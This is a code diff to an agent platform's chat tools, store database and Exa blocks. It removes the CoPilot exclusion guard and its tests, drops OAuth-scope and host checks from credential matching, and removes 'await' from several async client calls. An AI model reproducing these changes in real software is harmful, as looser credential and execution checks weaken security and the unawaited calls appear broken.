if not blocks:
return NoResultsResponse(

View File

@@ -1,139 +0,0 @@
"""Tests for block filtering in FindBlockTool."""
from unittest.mock import AsyncMock, MagicMock, patch
import pytest
from backend.api.features.chat.tools.find_block import (
COPILOT_EXCLUDED_BLOCK_IDS,
COPILOT_EXCLUDED_BLOCK_TYPES,
FindBlockTool,
)
from backend.api.features.chat.tools.models import BlockListResponse
from backend.data.block import BlockType
from ._test_data import make_session
_TEST_USER_ID = "test-user-find-block"
def make_mock_block(
block_id: str, name: str, block_type: BlockType, disabled: bool = False
):
"""Create a mock block for testing."""
mock = MagicMock()
mock.id = block_id
mock.name = name
mock.description = f"{name} description"
mock.block_type = block_type
mock.disabled = disabled
mock.input_schema = MagicMock()
mock.input_schema.jsonschema.return_value = {"properties": {}, "required": []}
mock.input_schema.get_credentials_fields.return_value = {}
mock.output_schema = MagicMock()
mock.output_schema.jsonschema.return_value = {}
mock.categories = []
return mock
class TestFindBlockFiltering:
"""Tests for block filtering in FindBlockTool."""
def test_excluded_block_types_contains_expected_types(self):
"""Verify COPILOT_EXCLUDED_BLOCK_TYPES contains all graph-only types."""
assert BlockType.INPUT in COPILOT_EXCLUDED_BLOCK_TYPES
assert BlockType.OUTPUT in COPILOT_EXCLUDED_BLOCK_TYPES
assert BlockType.WEBHOOK in COPILOT_EXCLUDED_BLOCK_TYPES
assert BlockType.WEBHOOK_MANUAL in COPILOT_EXCLUDED_BLOCK_TYPES
assert BlockType.NOTE in COPILOT_EXCLUDED_BLOCK_TYPES
assert BlockType.HUMAN_IN_THE_LOOP in COPILOT_EXCLUDED_BLOCK_TYPES
assert BlockType.AGENT in COPILOT_EXCLUDED_BLOCK_TYPES
def test_excluded_block_ids_contains_smart_decision_maker(self):
"""Verify SmartDecisionMakerBlock is in COPILOT_EXCLUDED_BLOCK_IDS."""
assert "3b191d9f-356f-482d-8238-ba04b6d18381" in COPILOT_EXCLUDED_BLOCK_IDS
@pytest.mark.asyncio(loop_scope="session")
async def test_excluded_block_type_filtered_from_results(self):
"""Verify blocks with excluded BlockTypes are filtered from search results."""
session = make_session(user_id=_TEST_USER_ID)
# Mock search returns an INPUT block (excluded) and a STANDARD block (included)
search_results = [
{"content_id": "input-block-id", "score": 0.9},
{"content_id": "standard-block-id", "score": 0.8},
]
input_block = make_mock_block("input-block-id", "Input Block", BlockType.INPUT)
standard_block = make_mock_block(
"standard-block-id", "HTTP Request", BlockType.STANDARD
)
def mock_get_block(block_id):
return {
"input-block-id": input_block,
"standard-block-id": standard_block,
}.get(block_id)
with patch(
"backend.api.features.chat.tools.find_block.unified_hybrid_search",
new_callable=AsyncMock,
return_value=(search_results, 2),
):
with patch(
"backend.api.features.chat.tools.find_block.get_block",
side_effect=mock_get_block,
):
tool = FindBlockTool()
response = await tool._execute(
user_id=_TEST_USER_ID, session=session, query="test"
)
# Should only return the standard block, not the INPUT block
assert isinstance(response, BlockListResponse)
assert len(response.blocks) == 1
assert response.blocks[0].id == "standard-block-id"
@pytest.mark.asyncio(loop_scope="session")
async def test_excluded_block_id_filtered_from_results(self):
"""Verify SmartDecisionMakerBlock is filtered from search results."""
session = make_session(user_id=_TEST_USER_ID)
smart_decision_id = "3b191d9f-356f-482d-8238-ba04b6d18381"
search_results = [
{"content_id": smart_decision_id, "score": 0.9},
{"content_id": "normal-block-id", "score": 0.8},
]
# SmartDecisionMakerBlock has STANDARD type but is excluded by ID
smart_block = make_mock_block(
smart_decision_id, "Smart Decision Maker", BlockType.STANDARD
)
normal_block = make_mock_block(
"normal-block-id", "Normal Block", BlockType.STANDARD
)
def mock_get_block(block_id):
return {
smart_decision_id: smart_block,
"normal-block-id": normal_block,
}.get(block_id)
with patch(
"backend.api.features.chat.tools.find_block.unified_hybrid_search",
new_callable=AsyncMock,
return_value=(search_results, 2),
):
with patch(
"backend.api.features.chat.tools.find_block.get_block",
side_effect=mock_get_block,
):
tool = FindBlockTool()
response = await tool._execute(
user_id=_TEST_USER_ID, session=session, query="decision"
)
# Should only return normal block, not SmartDecisionMakerBlock
assert isinstance(response, BlockListResponse)
assert len(response.blocks) == 1
assert response.blocks[0].id == "normal-block-id"

View File

@@ -1,29 +0,0 @@
"""Shared helpers for chat tools."""
from typing import Any
def get_inputs_from_schema(
input_schema: dict[str, Any],
exclude_fields: set[str] | None = None,
) -> list[dict[str, Any]]:
"""Extract input field info from JSON schema."""
if not isinstance(input_schema, dict):
return []
exclude = exclude_fields or set()
properties = input_schema.get("properties", {})
required = set(input_schema.get("required", []))
return [
{
"name": name,
"title": schema.get("title", name),
"type": schema.get("type", "string"),
"description": schema.get("description", ""),
"required": name in required,
"default": schema.get("default"),
}
for name, schema in properties.items()
if name not in exclude
]

View File

@@ -335,17 +335,11 @@ class BlockInfoSummary(BaseModel):
name: str
description: str
categories: list[str]
input_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block inputs",
)
output_schema: dict[str, Any] = Field(
default_factory=dict,
description="Full JSON schema for block outputs",
)
input_schema: dict[str, Any]
output_schema: dict[str, Any]
required_inputs: list[BlockInputFieldInfo] = Field(
default_factory=list,
description="List of input fields for this block",
description="List of required input fields for this block",
)
@@ -358,7 +352,7 @@ class BlockListResponse(ToolResponseBase):
query: str
usage_hint: str = Field(
default="To execute a block, call run_block with block_id set to the block's "
"'id' field and input_data containing the fields listed in required_inputs."
"'id' field and input_data containing the required fields from input_schema."
)

View File

@@ -24,7 +24,6 @@ from backend.util.timezone_utils import (
)
from .base import BaseTool
from .helpers import get_inputs_from_schema
from .models import (
AgentDetails,
AgentDetailsResponse,
@@ -262,7 +261,7 @@ class RunAgentTool(BaseTool):
),
requirements={
"credentials": requirements_creds_list,
"inputs": get_inputs_from_schema(graph.input_schema),
"inputs": self._get_inputs_list(graph.input_schema),
"execution_modes": self._get_execution_modes(graph),
},
),
@@ -370,6 +369,22 @@ class RunAgentTool(BaseTool):
session_id=session_id,
)
def _get_inputs_list(self, input_schema: dict[str, Any]) -> list[dict[str, Any]]:
"""Extract inputs list from schema."""
inputs_list = []
if isinstance(input_schema, dict) and "properties" in input_schema:
for field_name, field_schema in input_schema["properties"].items():
inputs_list.append(
{
"name": field_name,
"title": field_schema.get("title", field_name),
"type": field_schema.get("type", "string"),
"description": field_schema.get("description", ""),
"required": field_name in input_schema.get("required", []),
}
)
return inputs_list
def _get_execution_modes(self, graph: GraphModel) -> list[str]:
"""Get available execution modes for the graph."""
trigger_info = graph.trigger_setup_info
@@ -383,7 +398,7 @@ class RunAgentTool(BaseTool):
suffix: str,
) -> str:
"""Build a message describing available inputs for an agent."""
inputs_list = get_inputs_from_schema(graph.input_schema)
inputs_list = self._get_inputs_list(graph.input_schema)
required_names = [i["name"] for i in inputs_list if i["required"]]
optional_names = [i["name"] for i in inputs_list if not i["required"]]

View File

@@ -8,19 +8,14 @@ from typing import Any
from pydantic_core import PydanticUndefined
from backend.api.features.chat.model import ChatSession
from backend.api.features.chat.tools.find_block import (
COPILOT_EXCLUDED_BLOCK_IDS,
COPILOT_EXCLUDED_BLOCK_TYPES,
)
from backend.data.block import AnyBlockSchema, get_block
from backend.data.block import get_block
from backend.data.execution import ExecutionContext
from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
from backend.data.model import CredentialsMetaInput
from backend.data.workspace import get_or_create_workspace
from backend.integrations.creds_manager import IntegrationCredentialsManager
from backend.util.exceptions import BlockError
from .base import BaseTool
from .helpers import get_inputs_from_schema
from .models import (
BlockOutputResponse,
ErrorResponse,
@@ -29,10 +24,7 @@ from .models import (
ToolResponseBase,
UserReadiness,
)
from .utils import (
build_missing_credentials_from_field_info,
match_credentials_to_requirements,
)
from .utils import build_missing_credentials_from_field_info
logger = logging.getLogger(__name__)
@@ -81,6 +73,91 @@ class RunBlockTool(BaseTool):
def requires_auth(self) -> bool:
return True
async def _check_block_credentials(
self,
user_id: str,
block: Any,
input_data: dict[str, Any] | None = None,
) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
"""
Check if user has required credentials for a block.
Args:
user_id: User ID
block: Block to check credentials for
input_data: Input data for the block (used to determine provider via discriminator)
Returns:
tuple[matched_credentials, missing_credentials]
"""
matched_credentials: dict[str, CredentialsMetaInput] = {}
missing_credentials: list[CredentialsMetaInput] = []
input_data = input_data or {}
# Get credential field info from block's input schema
credentials_fields_info = block.input_schema.get_credentials_fields_info()
if not credentials_fields_info:
return matched_credentials, missing_credentials
# Get user's available credentials
creds_manager = IntegrationCredentialsManager()
available_creds = await creds_manager.store.get_all_creds(user_id)
for field_name, field_info in credentials_fields_info.items():
effective_field_info = field_info
if field_info.discriminator and field_info.discriminator_mapping:
# Get discriminator from input, falling back to schema default
discriminator_value = input_data.get(field_info.discriminator)
if discriminator_value is None:
field = block.input_schema.model_fields.get(
field_info.discriminator
)
if field and field.default is not PydanticUndefined:
discriminator_value = field.default
if (
discriminator_value
and discriminator_value in field_info.discriminator_mapping
):
effective_field_info = field_info.discriminate(discriminator_value)
logger.debug(
f"Discriminated provider for {field_name}: "
f"{discriminator_value} -> {effective_field_info.provider}"
)
matching_cred = next(
(
cred
for cred in available_creds
if cred.provider in effective_field_info.provider
and cred.type in effective_field_info.supported_types
),
None,
)
if matching_cred:
matched_credentials[field_name] = CredentialsMetaInput(
id=matching_cred.id,
provider=matching_cred.provider, # type: ignore
type=matching_cred.type,
title=matching_cred.title,
)
else:
# Create a placeholder for the missing credential
provider = next(iter(effective_field_info.provider), "unknown")
cred_type = next(iter(effective_field_info.supported_types), "api_key")
missing_credentials.append(
CredentialsMetaInput(
id=field_name,
provider=provider, # type: ignore
type=cred_type, # type: ignore
title=field_name.replace("_", " ").title(),
)
)
return matched_credentials, missing_credentials
async def _execute(
self,
user_id: str | None,
@@ -135,24 +212,11 @@ class RunBlockTool(BaseTool):
session_id=session_id,
)
# Check if block is excluded from CoPilot (graph-only blocks)
if (
block.block_type in COPILOT_EXCLUDED_BLOCK_TYPES
or block.id in COPILOT_EXCLUDED_BLOCK_IDS
):
return ErrorResponse(
message=(
f"Block '{block.name}' cannot be run directly in CoPilot. "
"This block is designed for use within graphs only."
),
session_id=session_id,
)
logger.info(f"Executing block {block.name} ({block_id}) for user {user_id}")
creds_manager = IntegrationCredentialsManager()
matched_credentials, missing_credentials = (
await self._resolve_block_credentials(user_id, block, input_data)
matched_credentials, missing_credentials = await self._check_block_credentials(
user_id, block, input_data
)
if missing_credentials:
@@ -281,75 +345,29 @@ class RunBlockTool(BaseTool):
session_id=session_id,
)
async def _resolve_block_credentials(
self,
user_id: str,
block: AnyBlockSchema,
input_data: dict[str, Any] | None = None,
) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
"""
Resolve credentials for a block by matching user's available credentials.
Args:
user_id: User ID
block: Block to resolve credentials for
input_data: Input data for the block (used to determine provider via discriminator)
Returns:
tuple of (matched_credentials, missing_credentials) - matched credentials
are used for block execution, missing ones indicate setup requirements.
"""
input_data = input_data or {}
requirements = self._resolve_discriminated_credentials(block, input_data)
if not requirements:
return {}, []
return await match_credentials_to_requirements(user_id, requirements)
def _get_inputs_list(self, block: AnyBlockSchema) -> list[dict[str, Any]]:
def _get_inputs_list(self, block: Any) -> list[dict[str, Any]]:
"""Extract non-credential inputs from block schema."""
inputs_list = []
schema = block.input_schema.jsonschema()
properties = schema.get("properties", {})
required_fields = set(schema.get("required", []))
# Get credential field names to exclude
credentials_fields = set(block.input_schema.get_credentials_fields().keys())
return get_inputs_from_schema(schema, exclude_fields=credentials_fields)
def _resolve_discriminated_credentials(
self,
block: AnyBlockSchema,
input_data: dict[str, Any],
) -> dict[str, CredentialsFieldInfo]:
"""Resolve credential requirements, applying discriminator logic where needed."""
credentials_fields_info = block.input_schema.get_credentials_fields_info()
if not credentials_fields_info:
return {}
for field_name, field_schema in properties.items():
# Skip credential fields
if field_name in credentials_fields:
continue
resolved: dict[str, CredentialsFieldInfo] = {}
inputs_list.append(
{
"name": field_name,
"title": field_schema.get("title", field_name),
"type": field_schema.get("type", "string"),
"description": field_schema.get("description", ""),
"required": field_name in required_fields,
}
)
for field_name, field_info in credentials_fields_info.items():
effective_field_info = field_info
if field_info.discriminator and field_info.discriminator_mapping:
discriminator_value = input_data.get(field_info.discriminator)
if discriminator_value is None:
field = block.input_schema.model_fields.get(
field_info.discriminator
)
if field and field.default is not PydanticUndefined:
discriminator_value = field.default
if (
discriminator_value
and discriminator_value in field_info.discriminator_mapping
):
effective_field_info = field_info.discriminate(discriminator_value)
# For host-scoped credentials, add the discriminator value
# (e.g., URL) so _credential_is_for_host can match it
effective_field_info.discriminator_values.add(discriminator_value)
logger.debug(
f"Discriminated provider for {field_name}: "
f"{discriminator_value} -> {effective_field_info.provider}"
)
resolved[field_name] = effective_field_info
return resolved
return inputs_list

View File

@@ -1,106 +0,0 @@
"""Tests for block execution guards in RunBlockTool."""
from unittest.mock import MagicMock, patch
import pytest
from backend.api.features.chat.tools.models import ErrorResponse
from backend.api.features.chat.tools.run_block import RunBlockTool
from backend.data.block import BlockType
from ._test_data import make_session
_TEST_USER_ID = "test-user-run-block"
def make_mock_block(
block_id: str, name: str, block_type: BlockType, disabled: bool = False
):
"""Create a mock block for testing."""
mock = MagicMock()
mock.id = block_id
mock.name = name
mock.block_type = block_type
mock.disabled = disabled
mock.input_schema = MagicMock()
mock.input_schema.jsonschema.return_value = {"properties": {}, "required": []}
mock.input_schema.get_credentials_fields_info.return_value = []
return mock
class TestRunBlockFiltering:
"""Tests for block execution guards in RunBlockTool."""
@pytest.mark.asyncio(loop_scope="session")
async def test_excluded_block_type_returns_error(self):
"""Attempting to execute a block with excluded BlockType returns error."""
session = make_session(user_id=_TEST_USER_ID)
input_block = make_mock_block("input-block-id", "Input Block", BlockType.INPUT)
with patch(
"backend.api.features.chat.tools.run_block.get_block",
return_value=input_block,
):
tool = RunBlockTool()
response = await tool._execute(
user_id=_TEST_USER_ID,
session=session,
block_id="input-block-id",
input_data={},
)
assert isinstance(response, ErrorResponse)
assert "cannot be run directly in CoPilot" in response.message
assert "designed for use within graphs only" in response.message
@pytest.mark.asyncio(loop_scope="session")
async def test_excluded_block_id_returns_error(self):
"""Attempting to execute SmartDecisionMakerBlock returns error."""
session = make_session(user_id=_TEST_USER_ID)
smart_decision_id = "3b191d9f-356f-482d-8238-ba04b6d18381"
smart_block = make_mock_block(
smart_decision_id, "Smart Decision Maker", BlockType.STANDARD
)
with patch(
"backend.api.features.chat.tools.run_block.get_block",
return_value=smart_block,
):
tool = RunBlockTool()
response = await tool._execute(
user_id=_TEST_USER_ID,
session=session,
block_id=smart_decision_id,
input_data={},
)
assert isinstance(response, ErrorResponse)
assert "cannot be run directly in CoPilot" in response.message
@pytest.mark.asyncio(loop_scope="session")
async def test_non_excluded_block_passes_guard(self):
"""Non-excluded blocks pass the filtering guard (may fail later for other reasons)."""
session = make_session(user_id=_TEST_USER_ID)
standard_block = make_mock_block(
"standard-id", "HTTP Request", BlockType.STANDARD
)
with patch(
"backend.api.features.chat.tools.run_block.get_block",
return_value=standard_block,
):
tool = RunBlockTool()
response = await tool._execute(
user_id=_TEST_USER_ID,
session=session,
block_id="standard-id",
input_data={},
)
# Should NOT be an ErrorResponse about CoPilot exclusion
# (may be other errors like missing credentials, but not the exclusion guard)
if isinstance(response, ErrorResponse):
assert "cannot be run directly in CoPilot" not in response.message

View File

@@ -6,9 +6,9 @@ from typing import Any
from backend.api.features.library import db as library_db
from backend.api.features.library import model as library_model
from backend.api.features.store import db as store_db
from backend.data import graph as graph_db
from backend.data.graph import GraphModel
from backend.data.model import (
Credentials,
CredentialsFieldInfo,
CredentialsMetaInput,
HostScopedCredentials,
@@ -44,8 +44,14 @@ async def fetch_graph_from_store_slug(
return None, None
# Get the graph from store listing version
graph = await store_db.get_available_graph(
store_agent.store_listing_version_id, hide_nodes=False
graph_meta = await store_db.get_available_graph(
store_agent.store_listing_version_id
)
graph = await graph_db.get_graph(
graph_id=graph_meta.id,
version=graph_meta.version,
user_id=None, # Public access
include_subgraphs=True,
)
return graph, store_agent
@@ -122,7 +128,7 @@ def build_missing_credentials_from_graph(
return {
field_key: _serialize_missing_credential(field_key, field_info)
for field_key, (field_info, _, _) in aggregated_fields.items()
for field_key, (field_info, _node_fields) in aggregated_fields.items()
if field_key not in matched_keys
}
@@ -224,99 +230,6 @@ async def get_or_create_library_agent(
return library_agents[0]
async def match_credentials_to_requirements(
user_id: str,
requirements: dict[str, CredentialsFieldInfo],
) -> tuple[dict[str, CredentialsMetaInput], list[CredentialsMetaInput]]:
"""
Match user's credentials against a dictionary of credential requirements.
This is the core matching logic shared by both graph and block credential matching.
"""
matched: dict[str, CredentialsMetaInput] = {}
missing: list[CredentialsMetaInput] = []
if not requirements:
return matched, missing
available_creds = await get_user_credentials(user_id)
for field_name, field_info in requirements.items():
matching_cred = find_matching_credential(available_creds, field_info)
if matching_cred:
try:
matched[field_name] = create_credential_meta_from_match(matching_cred)
except Exception as e:
logger.error(
f"Failed to create CredentialsMetaInput for field '{field_name}': "
f"provider={matching_cred.provider}, type={matching_cred.type}, "
f"credential_id={matching_cred.id}",
exc_info=True,
)
provider = next(iter(field_info.provider), "unknown")
cred_type = next(iter(field_info.supported_types), "api_key")
missing.append(
CredentialsMetaInput(
id=field_name,
provider=provider, # type: ignore
type=cred_type, # type: ignore
title=f"{field_name} (validation failed: {e})",
)
)
else:
provider = next(iter(field_info.provider), "unknown")
cred_type = next(iter(field_info.supported_types), "api_key")
missing.append(
CredentialsMetaInput(
id=field_name,
provider=provider, # type: ignore
type=cred_type, # type: ignore
title=field_name.replace("_", " ").title(),
)
)
return matched, missing
async def get_user_credentials(user_id: str) -> list[Credentials]:
"""Get all available credentials for a user."""
creds_manager = IntegrationCredentialsManager()
return await creds_manager.store.get_all_creds(user_id)
def find_matching_credential(
available_creds: list[Credentials],
field_info: CredentialsFieldInfo,
) -> Credentials | None:
"""Find a credential that matches the required provider, type, scopes, and host."""
for cred in available_creds:
if cred.provider not in field_info.provider:
continue
if cred.type not in field_info.supported_types:
continue
if cred.type == "oauth2" and not _credential_has_required_scopes(
cred, field_info
):
continue
if cred.type == "host_scoped" and not _credential_is_for_host(cred, field_info):
continue
return cred
return None
def create_credential_meta_from_match(
matching_cred: Credentials,
) -> CredentialsMetaInput:
"""Create a CredentialsMetaInput from a matched credential."""
return CredentialsMetaInput(
id=matching_cred.id,
provider=matching_cred.provider, # type: ignore
type=matching_cred.type,
title=matching_cred.title,
)
async def match_user_credentials_to_graph(
user_id: str,
graph: GraphModel,
@@ -356,8 +269,7 @@ async def match_user_credentials_to_graph(
# provider is in the set of acceptable providers.
for credential_field_name, (
credential_requirements,
_,
_,
_node_fields,
) in aggregated_creds.items():
# Find first matching credential by provider, type, and scopes
matching_cred = next(
@@ -425,6 +337,8 @@ def _credential_has_required_scopes(
# If no scopes are required, any credential matches
if not requirements.required_scopes:
return True
# Check that credential scopes are a superset of required scopes
return set(credential.scopes).issuperset(requirements.required_scopes)

View File

@@ -374,7 +374,7 @@ async def get_library_agent_by_graph_id(
async def add_generated_agent_image(
graph: graph_db.GraphBaseMeta,
graph: graph_db.BaseGraph,
user_id: str,
library_agent_id: str,
) -> Optional[prisma.models.LibraryAgent]:

View File

@@ -1,7 +1,7 @@
import asyncio
import logging
from datetime import datetime, timezone
from typing import Any, Literal, overload
from typing import Any, Literal
import fastapi
import prisma.enums
@@ -11,8 +11,8 @@ import prisma.types
from backend.data.db import transaction
from backend.data.graph import (
GraphMeta,
GraphModel,
GraphModelWithoutNodes,
get_graph,
get_graph_as_admin,
get_sub_graphs,
@@ -334,22 +334,7 @@ async def get_store_agent_details(
raise DatabaseError("Failed to fetch agent details") from e
@overload
async def get_available_graph(
store_listing_version_id: str, hide_nodes: Literal[False]
) -> GraphModel: ...
@overload
async def get_available_graph(
store_listing_version_id: str, hide_nodes: Literal[True] = True
) -> GraphModelWithoutNodes: ...
async def get_available_graph(
store_listing_version_id: str,
hide_nodes: bool = True,
) -> GraphModelWithoutNodes | GraphModel:
async def get_available_graph(store_listing_version_id: str) -> GraphMeta:
try:
# Get avaialble, non-deleted store listing version
store_listing_version = (
@@ -359,7 +344,7 @@ async def get_available_graph(
"isAvailable": True,
"isDeleted": False,
},
include={"AgentGraph": {"include": AGENT_GRAPH_INCLUDE}},
include={"AgentGraph": {"include": {"Nodes": True}}},
)
)
@@ -369,9 +354,7 @@ async def get_available_graph(
detail=f"Store listing version {store_listing_version_id} not found",
)
return (GraphModelWithoutNodes if hide_nodes else GraphModel).from_db(
store_listing_version.AgentGraph
)
return GraphModel.from_db(store_listing_version.AgentGraph).meta()
except Exception as e:
logger.error(f"Error getting agent: {e}")

View File

@@ -8,7 +8,6 @@ Includes BM25 reranking for improved lexical relevance.
import logging
import re
import time
from dataclasses import dataclass
from typing import Any, Literal
@@ -363,11 +362,7 @@ async def unified_hybrid_search(
LIMIT {limit_param} OFFSET {offset_param}
"""
try:
results = await query_raw_with_schema(sql_query, *params)
except Exception as e:
await _log_vector_error_diagnostics(e)
raise
results = await query_raw_with_schema(sql_query, *params)
total = results[0]["total_count"] if results else 0
# Apply BM25 reranking
@@ -691,11 +686,7 @@ async def hybrid_search(
LIMIT {limit_param} OFFSET {offset_param}
"""
try:
results = await query_raw_with_schema(sql_query, *params)
except Exception as e:
await _log_vector_error_diagnostics(e)
raise
results = await query_raw_with_schema(sql_query, *params)
total = results[0]["total_count"] if results else 0
@@ -727,87 +718,6 @@ async def hybrid_search_simple(
return await hybrid_search(query=query, page=page, page_size=page_size)
# ============================================================================
# Diagnostics
# ============================================================================
# Rate limit: only log vector error diagnostics once per this interval
_VECTOR_DIAG_INTERVAL_SECONDS = 60
_last_vector_diag_time: float = 0
async def _log_vector_error_diagnostics(error: Exception) -> None:
"""Log diagnostic info when 'type vector does not exist' error occurs.
Note: Diagnostic queries use query_raw_with_schema which may run on a different
pooled connection than the one that failed. Session-level search_path can differ,
so these diagnostics show cluster-wide state, not necessarily the failed session.
Includes rate limiting to avoid log spam - only logs once per minute.
Caller should re-raise the error after calling this function.
"""
global _last_vector_diag_time
# Check if this is the vector type error
error_str = str(error).lower()
if not (
"type" in error_str and "vector" in error_str and "does not exist" in error_str
):
return
# Rate limit: only log once per interval
now = time.time()
if now - _last_vector_diag_time < _VECTOR_DIAG_INTERVAL_SECONDS:
return
_last_vector_diag_time = now
try:
diagnostics: dict[str, object] = {}
try:
search_path_result = await query_raw_with_schema("SHOW search_path")
diagnostics["search_path"] = search_path_result
except Exception as e:
diagnostics["search_path"] = f"Error: {e}"
try:
schema_result = await query_raw_with_schema("SELECT current_schema()")
diagnostics["current_schema"] = schema_result
except Exception as e:
diagnostics["current_schema"] = f"Error: {e}"
try:
user_result = await query_raw_with_schema(
"SELECT current_user, session_user, current_database()"
)
diagnostics["user_info"] = user_result
except Exception as e:
diagnostics["user_info"] = f"Error: {e}"
try:
# Check pgvector extension installation (cluster-wide, stable info)
ext_result = await query_raw_with_schema(
"SELECT extname, extversion, nspname as schema "
"FROM pg_extension e "
"JOIN pg_namespace n ON e.extnamespace = n.oid "
"WHERE extname = 'vector'"
)
diagnostics["pgvector_extension"] = ext_result
except Exception as e:
diagnostics["pgvector_extension"] = f"Error: {e}"
logger.error(
f"Vector type error diagnostics:\n"
f" Error: {error}\n"
f" search_path: {diagnostics.get('search_path')}\n"
f" current_schema: {diagnostics.get('current_schema')}\n"
f" user_info: {diagnostics.get('user_info')}\n"
f" pgvector_extension: {diagnostics.get('pgvector_extension')}"
)
except Exception as diag_error:
logger.error(f"Failed to collect vector error diagnostics: {diag_error}")
# Backward compatibility alias - HybridSearchWeights maps to StoreAgentSearchWeights
# for existing code that expects the popularity parameter
HybridSearchWeights = StoreAgentSearchWeights

View File

@@ -16,7 +16,7 @@ from backend.blocks.ideogram import (
StyleType,
UpscaleOption,
)
from backend.data.graph import GraphBaseMeta
from backend.data.graph import BaseGraph
from backend.data.model import CredentialsMetaInput, ProviderName
from backend.integrations.credentials_store import ideogram_credentials
from backend.util.request import Requests
@@ -34,14 +34,14 @@ class ImageStyle(str, Enum):
DIGITAL_ART = "digital art"
async def generate_agent_image(agent: GraphBaseMeta | AgentGraph) -> io.BytesIO:
async def generate_agent_image(agent: BaseGraph | AgentGraph) -> io.BytesIO:
if settings.config.use_agent_image_generation_v2:
return await generate_agent_image_v2(graph=agent)
else:
return await generate_agent_image_v1(agent=agent)
async def generate_agent_image_v2(graph: GraphBaseMeta | AgentGraph) -> io.BytesIO:
async def generate_agent_image_v2(graph: BaseGraph | AgentGraph) -> io.BytesIO:
"""
Generate an image for an agent using Ideogram model.
Returns:
@@ -54,17 +54,14 @@ async def generate_agent_image_v2(graph: GraphBaseMeta | AgentGraph) -> io.Bytes
description = f"{name} ({graph.description})" if graph.description else name
prompt = (
"Create a visually striking retro-futuristic vector pop art illustration "
f'prominently featuring "{name}" in bold typography. The image clearly and '
f"literally depicts a {description}, along with recognizable objects directly "
f"associated with the primary function of a {name}. "
f"Ensure the imagery is concrete, intuitive, and immediately understandable, "
f"clearly conveying the purpose of a {name}. "
"Maintain vibrant, limited-palette colors, sharp vector lines, "
"geometric shapes, flat illustration techniques, and solid colors "
"without gradients or shading. Preserve a retro-futuristic aesthetic "
"influenced by mid-century futurism and 1960s psychedelia, "
"prioritizing clear visual storytelling and thematic clarity above all else."
f"Create a visually striking retro-futuristic vector pop art illustration prominently featuring "
f'"{name}" in bold typography. The image clearly and literally depicts a {description}, '
f"along with recognizable objects directly associated with the primary function of a {name}. "
f"Ensure the imagery is concrete, intuitive, and immediately understandable, clearly conveying the "
f"purpose of a {name}. Maintain vibrant, limited-palette colors, sharp vector lines, geometric "
f"shapes, flat illustration techniques, and solid colors without gradients or shading. Preserve a "
f"retro-futuristic aesthetic influenced by mid-century futurism and 1960s psychedelia, "
f"prioritizing clear visual storytelling and thematic clarity above all else."
)
custom_colors = [
@@ -102,12 +99,12 @@ async def generate_agent_image_v2(graph: GraphBaseMeta | AgentGraph) -> io.Bytes
return io.BytesIO(response.content)
async def generate_agent_image_v1(agent: GraphBaseMeta | AgentGraph) -> io.BytesIO:
async def generate_agent_image_v1(agent: BaseGraph | AgentGraph) -> io.BytesIO:
"""
Generate an image for an agent using Flux model via Replicate API.
Args:
agent (GraphBaseMeta | AgentGraph): The agent to generate an image for
agent (Graph): The agent to generate an image for
Returns:
io.BytesIO: The generated image as bytes
@@ -117,13 +114,7 @@ async def generate_agent_image_v1(agent: GraphBaseMeta | AgentGraph) -> io.Bytes
raise ValueError("Missing Replicate API key in settings")
# Construct prompt from agent details
prompt = (
"Create a visually engaging app store thumbnail for the AI agent "
"that highlights what it does in a clear and captivating way:\n"
f"- **Name**: {agent.name}\n"
f"- **Description**: {agent.description}\n"
f"Focus on showcasing its core functionality with an appealing design."
)
prompt = f"Create a visually engaging app store thumbnail for the AI agent that highlights what it does in a clear and captivating way:\n- **Name**: {agent.name}\n- **Description**: {agent.description}\nFocus on showcasing its core functionality with an appealing design."
# Set up Replicate client
client = ReplicateClient(api_token=settings.secrets.replicate_api_key)

View File

@@ -278,7 +278,7 @@ async def get_agent(
)
async def get_graph_meta_by_store_listing_version_id(
store_listing_version_id: str,
) -> backend.data.graph.GraphModelWithoutNodes:
) -> backend.data.graph.GraphMeta:
"""
Get Agent Graph from Store Listing Version ID.
"""

View File

@@ -478,7 +478,7 @@ class ExaCreateOrFindWebsetBlock(Block):
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
try:
webset = await aexa.websets.get(id=input_data.external_id)
webset = aexa.websets.get(id=input_data.external_id)
webset_result = Webset.model_validate(webset.model_dump(by_alias=True))
yield "webset", webset_result
@@ -494,7 +494,7 @@ class ExaCreateOrFindWebsetBlock(Block):
count=input_data.search_count,
)
webset = await aexa.websets.create(
webset = aexa.websets.create(
params=CreateWebsetParameters(
search=search_params,
external_id=input_data.external_id,
@@ -554,7 +554,7 @@ class ExaUpdateWebsetBlock(Block):
if input_data.metadata is not None:
payload["metadata"] = input_data.metadata
sdk_webset = await aexa.websets.update(id=input_data.webset_id, params=payload)
sdk_webset = aexa.websets.update(id=input_data.webset_id, params=payload)
status_str = (
sdk_webset.status.value
@@ -617,7 +617,7 @@ class ExaListWebsetsBlock(Block):
) -> BlockOutput:
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
response = await aexa.websets.list(
response = aexa.websets.list(
cursor=input_data.cursor,
limit=input_data.limit,
)
@@ -678,7 +678,7 @@ class ExaGetWebsetBlock(Block):
) -> BlockOutput:
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
sdk_webset = await aexa.websets.get(id=input_data.webset_id)
sdk_webset = aexa.websets.get(id=input_data.webset_id)
status_str = (
sdk_webset.status.value
@@ -748,7 +748,7 @@ class ExaDeleteWebsetBlock(Block):
) -> BlockOutput:
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
deleted_webset = await aexa.websets.delete(id=input_data.webset_id)
deleted_webset = aexa.websets.delete(id=input_data.webset_id)
status_str = (
deleted_webset.status.value
@@ -798,7 +798,7 @@ class ExaCancelWebsetBlock(Block):
) -> BlockOutput:
aexa = AsyncExa(api_key=credentials.api_key.get_secret_value())
canceled_webset = await aexa.websets.cancel(id=input_data.webset_id)
canceled_webset = aexa.websets.cancel(id=input_data.webset_id)
status_str = (
canceled_webset.status.value
@@ -968,7 +968,7 @@ class ExaPreviewWebsetBlock(Block):
entity["description"] = input_data.entity_description
payload["entity"] = entity
sdk_preview = await aexa.websets.preview(params=payload)
sdk_preview = aexa.websets.preview(params=payload)
preview = PreviewWebsetModel.from_sdk(sdk_preview)
@@ -1051,7 +1051,7 @@ class ExaWebsetStatusBlock(Block):
) -> BlockOutput:
